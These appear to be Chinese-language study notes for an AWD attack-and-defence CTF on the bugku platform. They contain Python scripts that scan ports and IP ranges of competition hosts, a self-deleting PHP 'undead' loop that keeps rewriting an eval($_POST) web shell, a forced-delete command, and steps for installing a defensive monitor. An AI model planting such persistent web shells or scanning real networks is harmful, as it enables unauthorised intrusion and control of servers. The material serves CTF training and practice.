rm -rf xxxx 删除命令 //当发现服务器被上马了可以快速删掉
Remote host填虚拟IP
New一个用户名和密码,填bugku上给的就行,用户名一般是teamx,然后端口给啥就要填啥,bugku的awd端口是2222
端口查询
import requests
url = "https://192-168-1-183.pvp5377.bugku.cn:"
for i in range(0,65536):
url_new = url + '{}'.format(i)
try:
if(requests.get(url_new).status_code == 200):
print(url_new + '能访问到')
except:
pass
IP段查询
import requests
url = "https://192-168-1-"
url2 = ".pvp5377.bugku.cn"
for i in range(1,256):
url_new = url + '{}'.format(i) + url2
try:
if(requests.get(url_new).status_code == 200):
print(url_new + '能访问到')
except:
pass
不死马示例
谨慎使用,不要在真实环境使用 ,容易吃大锅饭
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
$content = '<?php @eval($_POST["cmd"]);?>';
file_put_contents("shell.php",$content);
usleep(10000);
}
?>
1、ignore_user_abort()函数:函数设置与客户机断开是否会终止脚本的执行,如果设置为true,则忽略与用户的断开。
2、set_time_limit()函数:设置允许脚本运行的时间,单位为秒。如果设置为0(零),没有时间方面的限制。
3、unlink(__FILE__)函数;删除文件。
4、file_put_contents函数;将一个字符串写入文件。
5、usleep函数:延迟执行当前脚本若干微妙(一微妙等于一百万分之一秒)
AWD 攻防全流程
1、ssh连接
2、备份html文件夹,D盾扫描,发现其中的后门或者漏洞
3、上看鸟通防
php watchbird.php –install [Web目录]
例如:php watchbird.php –install /var/www/html
在网页运行/?watchbird=ui 进行管理系统界面,第一次需要设置密码
4、扫描IP网段,查询存在的IP(脚本扫描)
5、通过自己D盾扫描的漏洞,尝试进行漏洞利用,获取flag